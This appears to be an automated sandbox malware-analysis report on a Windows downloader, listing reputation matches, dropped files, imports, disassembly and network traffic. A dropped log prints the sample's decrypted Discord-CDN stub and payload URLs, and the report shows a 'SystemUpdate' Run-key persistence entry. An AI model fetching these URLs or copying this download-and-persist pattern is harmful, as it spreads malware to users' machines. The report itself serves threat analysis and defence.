                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: sNifdpWiY9.exe
                          TimeTypeDescription
                          11:41:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SystemUpdate C:\Users\user\Desktop\sNifdpWiY9.exe
                          11:41:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SystemUpdate C:\Users\user\Desktop\sNifdpWiY9.exe
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          162.159.134.233Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                          • cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
                          http://162.159.134.233:443Get hashmaliciousUnknownBrowse
                          • 162.159.134.233:443/
                          PO - Drawings And Specifications Sheet_pdf.scr.exeGet hashmaliciousAveMariaBrowse
                          • cdn.discordapp.com/attachments/472051232014598144/935778066171580456/Sjddks44.jpg
                          mvoElayshk.exeGet hashmaliciousAmadeyBrowse
                          • cdn.discordapp.com/attachments/880877737378734114/880877802512060426/5mgcqk6jl.exe
                          xuTyOmef1g.exeGet hashmaliciousAmadey RedLine SmokeLoaderBrowse
                          • cdn.discordapp.com/attachments/878382243242983437/879113244856430592/Microsoft.exe
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          cdn.discordapp.comEsgeCzT4do.exeGet hashmaliciousXWormBrowse
                          • 162.159.129.233
                          file.exeGet hashmaliciousUnknownBrowse
                          • 162.159.135.233
                          file.exeGet hashmaliciousCStealerBrowse
                          • 162.159.134.233
                          https://cdn.discordapp.com/attachments/1284277835762110544/1305291734967779460/emu.exe?ex=67327f28&is=67312da8&hm=ea20e1c2a609dc1a0569bd4abb7e0da0a5e0671f3f7a388c1ed138f806c8e0c4&Get hashmaliciousUnknownBrowse
                          • 162.159.135.233
                          SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeGet hashmaliciousXmrigBrowse
                          • 162.159.135.233
                          segura.vbsGet hashmaliciousRemcosBrowse
                          • 162.159.135.233
                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                          • 162.159.129.233
                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                          • 162.159.134.233
                          LDlanZur0i.exeGet hashmaliciousUnknownBrowse
                          • 162.159.135.233
                          Fa1QSXjTZD.exeGet hashmaliciousUnknownBrowse
                          • 162.159.133.233
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          BOUYGTEL-ISPFRarm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                          • 176.172.193.195
                          mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 176.171.163.190
                          teste.sh4.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                          • 176.168.49.73
                          x86_64.elfGet hashmaliciousMiraiBrowse
                          • 176.174.244.135
                          teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                          • 213.44.217.61
                          arm.elfGet hashmaliciousMiraiBrowse
                          • 176.133.142.235
                          xd.x86.elfGet hashmaliciousMiraiBrowse
                          • 89.92.92.48
                          sora.arm.elfGet hashmaliciousMiraiBrowse
                          • 176.156.54.55
                          la.bot.mips.elfGet hashmaliciousMiraiBrowse
                          • 31.37.175.230
                          la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                          • 31.35.80.168
                          CLOUDFLARENETUShttps://yrcisodockdxc.wixsite.com/so/ffPELWCGk/c?w=fTz-zc0Je0uykVBAmif5UmM6Rsu4kk-G5MXIVA5XOqg.eyJ1IjoiaHR0cHM6Ly9zZGtmaW93ZWkuY2xpY2svaG9tZS5waHAiLCJyIjoiZTU4NTRhMDUtMTAwNS00YjFmLTk5YzYtZjNhOTEzZjg3NDlmIiwibSI6Im1haWwiLCJjIjoiOTkwNzEzOGMtZWE2My00ODc4LTg3YTItZGEyMGZkMmQwZWY0In0Get hashmaliciousUnknownBrowse
                          • 172.67.202.96
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 172.67.165.166
                          https://lavender-rosamund-62.tiiny.site/Get hashmaliciousUnknownBrowse
                          • 104.22.70.197
                          payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                          • 162.159.200.123
                          List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                          • 172.64.41.3
                          ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                          • 172.64.41.3
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 172.67.165.166
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 104.21.16.9
                          https://click.pstmrk.it/3s/bmxn8t84vg.gherapilta.shop%2F/ySDk/28y5AQ/AQ/e82f1f59-f734-42be-affb-895d81855fb4/1/pD2JDTOBnbGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                          • 104.26.13.205
                          UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                          • 172.67.156.195
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          37f463bf4616ecd445d4a1937da06e19payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                          • 162.159.134.233
                          List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                          • 162.159.134.233
                          ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                          • 162.159.134.233
                          REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                          • 162.159.134.233
                          comp#U00e1rtilhar080425-000800-66000544000.exeGet hashmaliciousUnknownBrowse
                          • 162.159.134.233
                          file.exeGet hashmaliciousUnknownBrowse
                          • 162.159.134.233
                          file.exeGet hashmaliciousUnknownBrowse
                          • 162.159.134.233
                          comp#U00e1rtilhar080425-000800-66000544000.exeGet hashmaliciousUnknownBrowse
                          • 162.159.134.233
                          venomderek.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                          • 162.159.134.233
                          No context
                          Process:C:\Users\user\Desktop\sNifdpWiY9.exe
                          File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                          Category:dropped
                          Size (bytes):46592
                          Entropy (8bit):5.942582688854289
                          Encrypted:false
                          SSDEEP:768:/sdICDkg1uuHwCRP5JWCl9i4TbGMCxPcUgkar8r+lFRl7zCvSqnTOW:eICDknx6JdLTXqPcsar8aPR54OW
                          MD5:2EDDBA95F5818EF402BFE7FBAA0F6A18
                          SHA1:F8278B610C4C8417F8119FF6C25FD5707AD076F4
                          SHA-256:6654EBA29F53A9E47E5D7AC8875FF98DD44D81879BDD6EBCF32BD270FA700E32
                          SHA-512:8790AEE89E2B50FA26D5B10713568531EC0D0075BCDBEAAF94A83B9831CAD77AAB73B1E335DAA25A56A2EFB77528427A069FAED378C1F0D142437E284706136A
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 3%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Pg...............+.z.....................@.............................@............`... ...................................................... .......................0..................................(...................X................................text...xx.......z..................`..`.data................~..............@....rdata..............................@..@.pdata..............................@..@.xdata..L...........................@..@.bss.....................................idata..............................@....CRT....`...........................@....tls................................@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................
                          Process:C:\Users\user\Desktop\sNifdpWiY9.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):210624
                          Entropy (8bit):7.999047266892008
                          Encrypted:true
                          SSDEEP:3072:tQh3ri9qF+lVg8dnrcmfONWs+Gz3oi7dczzAbMhywxPFSbVVJ4L8CJXatI4:tqG9qqVg8drcmfuW2DdcvxywZyvi8Ckf
                          MD5:3AC321648D8BA5E4085F3AEA6304FBBA
                          SHA1:294C73DCF2B41E3A726F9D85034C19F1FEC3227F
                          SHA-256:AF3642DDE9A7FA4BC99D80C54DD63C1A881436F2EE9F385505EC05644EDFF323
                          SHA-512:EB066C2863140E926DD27630DE53A066DE76179F2E3E430B6A35F734901C9733C1B05462ECBEEFF1A40D564D6C955F4358EB9D128ED2D3B35DAC49C9A1B94F79
                          Malicious:false
                          Preview:d..;N......e8...a...j.w:.F..v...,hu..3KW&.; .....nt.Wh&?......~...n.2.n?;`.Z`....?...q.....m...;].R.F..@a.I>5.......W"{...o...B..+.......'..lZ........S=@ZY.e.&v.r.V.w8Pu.b..eN7...#.q....%1..i.:..-..U`Y..C..1...0...JJ).lP..4.5t2'..dn...Vz/...dB.w.!O. .4..N.z5..5..Cs.d....?.`lO.......|.kM.L:.8{...../'.J{..-5.o6..LU.....6.....~n..L..d...:B..a...f..H.I..0].mm$0.b...d..b........B'.i...{../r.....4.....$[......N"..Gtk.qw..]}..BK.1..]Iu.....(...(b.k(.M...O...e...>..;d.....v..P.w;v..L....k..!..[.]s.\+n..X.|.o....j..PU......f.].on.^Y.Q..y.I.g.J...*..!0..,.&.ul'g.d.R].a......../...(.cFu. W..af....=...#`I..U.LJAr...i.t.G...M.?..."=.8......".)...$.|2..+ p.S.A;..._.l..p....l....i:..e......F...'...{9A.<D...g.(G8r..shar....p.?...u.j.;^jf.HM.<..7`...`....S.Y=..A.1.r.\..2..{.....fgG..W.`..w3.%~#.@.E.f...k..C.....&WR8..@..T..OP5..d...x..?|....p.?...W..`..v.m.D~u...........vcU.s!..B.....b.?.]0C,...G.~......9.G`....T;.......V...P.A..O...;.(.<......t>.c.
                          Process:C:\Users\user\Desktop\sNifdpWiY9.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):210624
                          Entropy (8bit):7.999047266892008
                          Encrypted:true
                          SSDEEP:3072:tQh3ri9qF+lVg8dnrcmfONWs+Gz3oi7dczzAbMhywxPFSbVVJ4L8CJXatI4:tqG9qqVg8drcmfuW2DdcvxywZyvi8Ckf
                          MD5:3AC321648D8BA5E4085F3AEA6304FBBA
                          SHA1:294C73DCF2B41E3A726F9D85034C19F1FEC3227F
                          SHA-256:AF3642DDE9A7FA4BC99D80C54DD63C1A881436F2EE9F385505EC05644EDFF323
                          SHA-512:EB066C2863140E926DD27630DE53A066DE76179F2E3E430B6A35F734901C9733C1B05462ECBEEFF1A40D564D6C955F4358EB9D128ED2D3B35DAC49C9A1B94F79
                          Malicious:false
                          Preview:d..;N......e8...a...j.w:.F..v...,hu..3KW&.; .....nt.Wh&?......~...n.2.n?;`.Z`....?...q.....m...;].R.F..@a.I>5.......W"{...o...B..+.......'..lZ........S=@ZY.e.&v.r.V.w8Pu.b..eN7...#.q....%1..i.:..-..U`Y..C..1...0...JJ).lP..4.5t2'..dn...Vz/...dB.w.!O. .4..N.z5..5..Cs.d....?.`lO.......|.kM.L:.8{...../'.J{..-5.o6..LU.....6.....~n..L..d...:B..a...f..H.I..0].mm$0.b...d..b........B'.i...{../r.....4.....$[......N"..Gtk.qw..]}..BK.1..]Iu.....(...(b.k(.M...O...e...>..;d.....v..P.w;v..L....k..!..[.]s.\+n..X.|.o....j..PU......f.].on.^Y.Q..y.I.g.J...*..!0..,.&.ul'g.d.R].a......../...(.cFu. W..af....=...#`I..U.LJAr...i.t.G...M.?..."=.8......".)...$.|2..+ p.S.A;..._.l..p....l....i:..e......F...'...{9A.<D...g.(G8r..shar....p.?...u.j.;^jf.HM.<..7`...`....S.Y=..A.1.r.\..2..{.....fgG..W.`..w3.%~#.@.E.f...k..C.....&WR8..@..T..OP5..d...x..?|....p.?...W..`..v.m.D~u...........vcU.s!..B.....b.?.]0C,...G.~......9.G`....T;.......V...P.A..O...;.(.<......t>.c.
                          Process:C:\Users\user\Desktop\sNifdpWiY9.exe
                          File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                          Category:dropped
                          Size (bytes):46592
                          Entropy (8bit):5.942582688854289
                          Encrypted:false
                          SSDEEP:768:/sdICDkg1uuHwCRP5JWCl9i4TbGMCxPcUgkar8r+lFRl7zCvSqnTOW:eICDknx6JdLTXqPcsar8aPR54OW
                          MD5:2EDDBA95F5818EF402BFE7FBAA0F6A18
                          SHA1:F8278B610C4C8417F8119FF6C25FD5707AD076F4
                          SHA-256:6654EBA29F53A9E47E5D7AC8875FF98DD44D81879BDD6EBCF32BD270FA700E32
                          SHA-512:8790AEE89E2B50FA26D5B10713568531EC0D0075BCDBEAAF94A83B9831CAD77AAB73B1E335DAA25A56A2EFB77528427A069FAED378C1F0D142437E284706136A
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 3%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Pg...............+.z.....................@.............................@............`... ...................................................... .......................0..................................(...................X................................text...xx.......z..................`..`.data................~..............@....rdata..............................@..@.pdata..............................@..@.xdata..L...........................@..@.bss.....................................idata..............................@....CRT....`...........................@....tls................................@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................
                          Process:C:\Users\user\Desktop\sNifdpWiY9.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):780
                          Entropy (8bit):5.297191105608361
                          Encrypted:false
                          SSDEEP:12:XfuEE7ZRe/Doy8+X4gozEERObhlB5btwuEE7ZRe/Doy8+X4gReiVNHg:X12ebbFpvlB5bqt2ebbFteiY
                          MD5:7EABDEC0BA9931F52BF0DFFBF8B7E754
                          SHA1:FBB1A6D3075C05B11B965D29B060F7EC124497BC
                          SHA-256:F3C5F9449D6968F3517B1A79083B21E0007A2D2BFFFCEE6C723CBDBAD7B65CFE
                          SHA-512:65603B86CAEB66EC2A0A1DC4F1D5C9744DEDFD81DC9547A4E4BD6A3435AAE232A95F1FCFBC0A2D7707F54C3CEB9D422438FBC74AEF9A00DAB93B2952C6DDDB56
                          Malicious:false
                          Preview:[DEBUG] Decrypted Stub URL: https://cdn.discordapp.com/attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7&..[DEBUG] Decrypted Payload URL: https://cdn.discordapp.com/attachments/1178810474935111690/1314084840471265371/google.bin?ex=67527c60&is=67512ae0&hm=8f37e08b0f9684170b94f69a0483ca1c06a0768db952c1640cf4ff676e76255b&..[LOG] Attempting to download: https://cdn.discordapp.com/attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7&..[ERROR] Unable to open output file: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe..[ERROR] Failed to download stub...
                          File type:PE32+ executable (console) x86-64, for MS Windows
                          Entropy (8bit):6.002338745028714
                          TrID:
                          • Win64 Executable Console (202006/5) 92.65%
                          • Win64 Executable (generic) (12005/4) 5.51%
                          • Generic Win/DOS Executable (2004/3) 0.92%
                          • DOS Executable Generic (2002/1) 0.92%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:sNifdpWiY9.exe
                          File size:3'188'321 bytes
                          MD5:897699bdf92b6380fa7abd4fda6794ca
                          SHA1:16e0a3d46f9850c3f1c638c62607890068eb0423
                          SHA256:2c9c4c1ca31e6b9152ee5f772f6689fa2aa9df95e155aecbe4ef0ed054bfce3c
                          SHA512:d8ce1f5371749f8bb5b3927bed623bd7fb373205598671cd9577fbda8e1cf2a3f309c8cc641ab0a77afadedb7a92e41d19f99ff3a5a7cbd557c6ddb7d49f6df2
                          SSDEEP:49152:/o3ekZ+oKzRaR5sYjv5TlC05hYDqC3Td+TU:/ov+oKzRaU6W05hYDqC3Td+TU
                          TLSH:AFE5094369DB0DE9CED677B4A5C31335A734FD71CA2A1F2B6A08C23129536C4AE1EB50
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....MQg.0........&....+.......................@....................................3.0...`... ............................
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0x1400013e0
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x140000000
                          Subsystem:windows cui
                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                          Time Stamp:0x67514DEA [Thu Dec 5 06:53:30 2024 UTC]
                          TLS Callbacks:0x4000e960, 0x1, 0x4000e940, 0x1, 0x4001da50, 0x1
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:213420958f19349587a5b7c3979bf497
                          Instruction
                          dec eax
                          sub esp, 28h
                          dec eax
                          mov eax, dword ptr [000F3EB5h]
                          mov dword ptr [eax], 00000000h
                          call 00007EFC60CDBF7Fh
                          nop
                          nop
                          dec eax
                          add esp, 28h
                          ret
                          nop dword ptr [eax]
                          jmp 00007EFC60CF5C50h
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          dec eax
                          lea ecx, dword ptr [00000009h]
                          jmp 00007EFC60CDC1D9h
                          nop dword ptr [eax+00h]
                          ret
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          push ebp
                          push ebx
                          dec eax
                          sub esp, 38h
                          dec eax
                          lea ebp, dword ptr [esp+30h]
                          dec eax
                          mov dword ptr [ebp+20h], ecx
                          dec eax
                          mov dword ptr [ebp+28h], edx
                          inc esp
                          mov eax, eax
                          mov byte ptr [ebp+30h], al
                          dec eax
                          mov edx, dword ptr [ebp+28h]
                          dec eax
                          mov eax, dword ptr [ebp+20h]
                          dec eax
                          mov ecx, eax
                          call 00007EFC60DADD3Ch
                          dec eax
                          mov dword ptr [ebp-08h], 00000000h
                          jmp 00007EFC60CDC20Fh
                          dec eax
                          mov edx, dword ptr [ebp-08h]
                          dec eax
                          mov eax, dword ptr [ebp+20h]
                          dec eax
                          mov ecx, eax
                          call 00007EFC60DAE7E2h
                          movzx edx, byte ptr [eax]
                          xor dl, byte ptr [ebp+30h]
                          mov byte ptr [eax], dl
                          dec eax
                          add dword ptr [ebp-08h], 01h
                          dec eax
                          mov eax, dword ptr [ebp+28h]
                          dec eax
                          mov ecx, eax
                          call 00007EFC60D10F19h
                          dec eax
                          cmp dword ptr [ebp-08h], eax
                          setb al
                          test al, al
                          jne 00007EFC60CDC1BEh
                          jmp 00007EFC60CDC20Ch
                          dec eax
                          mov ebx, eax
                          dec eax
                          mov eax, dword ptr [ebp+20h]
                          dec eax
                          mov ecx, eax
                          call 00007EFC60DAE5CDh
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1210000x1bb8.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1250000x4e8.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1010000xc480.pdata
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1260000x1768.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0xf38c00x28.rdata
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x1216c00x630.idata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000xe80800xe8200943e1bb4f45b0dcefc60204cd1d567e5False0.3787653136779752data6.167871245080012IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .data0xea0000x30e00x320063dfa0840750b6caa441391b1e9de428False0.029375data0.3934755371444657IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rdata0xee0000x12c900x12e00f1016fedfd4c903c44d951fd48ae20d9False0.20414683360927152data4.985747226629727IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .pdata0x1010000xc4800xc60003d7df49b22099bd925945761fd2256eFalse0.5213068181818182data5.968171154622952IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .xdata0x10e0000x11b600x11c002d8cdf81c092da6c100435001fde9967False0.21024977992957747data4.99186112176398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .bss0x1200000xc700x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata0x1210000x1bb80x1c000c6146c8819491068dca2ae8c5ed8850False0.31529017857142855data4.619188818659977IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .CRT0x1230000x680x2008281acdab88920645a2643896879d79eFalse0.076171875data0.3586856557867809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .tls0x1240000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x1250000x4e80x60054ea7a27371c7f4b4f690ae8ae40bab3False0.333984375data4.783136965822635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x1260000x17680x18006989afab9be7629c3e3fdbd603449cf0False0.3997395833333333data5.414507326483683IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          /40x1280000xb800xc0035ae9879fddb0eaacb80bacaa68c6612False0.2099609375data1.911881271017625IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          /190x1290000x1b3800x1b4009a0485ad1b017c8ecc924b890fd76d85False0.4137847620412844data5.790395323757767IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          /310x1450000x56d90x58004fb81f09157eb18fedc2b78103f8c10aFalse0.21750710227272727data4.811724009546016IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          /450x14b0000xbe8f0xc000492341fa7c547fae44484898d5572635False0.5013427734375data5.028312388409318IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          /570x1570000x23980x2400cf698c7bfa3b4fe09c9d9f01c7496348False0.2734375data4.614778901409446IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          /700x15a0000x4320x600421bae777c354aa9ef112a8d01cb6177False0.3255208333333333data3.9937954600566736IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          /810x15b0000x39f80x3a00b6f7a22786b081e2e07f91e6f1b81269False0.1058728448275862data4.937443619036112IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          /970x15f0000xe3f70xe400181e2e0ab309c0e76863241b023e8031False0.5087719298245614data5.9247086423605255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          /1130x16e0000x6cc0x8003a33bec181ddf2b605fc24a8e6bd2693False0.63818359375data5.359140128070618IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_MANIFEST0x1250580x48fXML 1.0 document, ASCII text0.40102827763496146
                          DLLImport
                          ADVAPI32.dllAllocateAndInitializeSid, CheckTokenMembership, FreeSid, RegCloseKey, RegOpenKeyExA, RegSetValueExA
                          KERNEL32.dllCloseHandle, CreateEventA, CreateFileW, CreateHardLinkW, CreateProcessA, CreateSemaphoreA, DeleteCriticalSection, DeleteFileW, DuplicateHandle, EnterCriticalSection, ExitProcess, FindFirstVolumeW, FindNextVolumeW, FindVolumeClose, FormatMessageA, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetDiskFreeSpaceExW, GetFileAttributesW, GetFileInformationByHandle, GetFileSizeEx, GetFileType, GetFullPathNameW, GetHandleInformation, GetLastError, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetProcessAffinityMask, GetSystemTimeAsFileTime, GetTempPathW, GetThreadContext, GetThreadPriority, GetTickCount, GetVolumeInformationW, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, IsProcessorFeaturePresent, LeaveCriticalSection, LoadLibraryW, LocalFree, MoveFileExW, MultiByteToWideChar, OpenProcess, OutputDebugStringA, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, ReleaseSemaphore, RemoveDirectoryW, ResetEvent, ResumeThread, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetEndOfFile, SetEvent, SetFileAttributesA, SetFilePointer, SetLastError, SetProcessAffinityMask, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, Sleep, SuspendThread, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WideCharToMultiByte
                          msvcrt.dll__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _beginthreadex, _cexit, _close, _commode, _endthreadex, _errno, _fdopen, _findclose, _fileno, _filelengthi64, _fileno, _fmode, _fstat64, _get_osfhandle, _initterm, _lseeki64, _read, _setjmp, _strdup, _telli64, _vscprintf, _vsnprintf, _wchdir, _wchmod, _wfindfirst64, _wfindnext64, _wfopen, _wfullpath, _wgetcwd, _wmkdir, _wopen, _wstat64, _wutime64, abort, atexit, calloc, _write, exit, fclose, fflush, fgetpos, fopen, fprintf, fputc, fputs, fread, free, fsetpos, fwrite, getc, getenv, getwc, iswctype, localeconv, longjmp, malloc, mbstowcs, memchr, memcmp, memcpy, memmove, memset, printf, putc, putwc, realloc, setlocale, setvbuf, signal, strchr, strcmp, strcoll, strerror, strftime, strlen, strncmp, strtoul, strxfrm, towlower, towupper, ungetc, vfprintf, ungetwc, wcscat, wcscmp, wcscoll, wcscpy, wcsftime, wcslen, wcsxfrm
                          SHELL32.dllShellExecuteExA
                          USER32.dllMessageBoxA
                          WININET.dllInternetCloseHandle, InternetOpenA, InternetOpenUrlA, InternetReadFile
                          TimestampSource PortDest PortSource IPDest IP
                          Dec 5, 2024 11:41:03.278028011 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:03.278069019 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:03.278163910 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:03.289587021 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:03.289603949 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:04.508706093 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:04.508799076 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:04.674242973 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:04.674278975 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:04.674657106 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:04.674721003 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:04.676657915 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:04.723321915 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.030381918 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.030456066 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.030459881 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.030482054 CET44349700162.159.134.233192.168.2.7
